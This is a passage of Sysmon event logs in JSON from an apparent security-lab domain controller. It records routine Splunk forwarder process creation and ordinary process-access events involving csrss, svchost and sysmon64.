--no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nParentProcessId: 3240\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.563","ProcessGuid":"{41C8662E-1F77-5F25-0000-001072EA0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F77-5F25-0000-0010B1E90300}","ParentProcessId":"3240","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list replication_port --no-log","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nSourceProcessId: 3240\r\nSourceThreadId: 2772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001072EA0300}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","SourceProcessId":"3240","SourceThreadId":"2772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001072EA0300}","TargetProcessId":"3956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001072EA0300}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001072EA0300}","TargetProcessId":"3956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
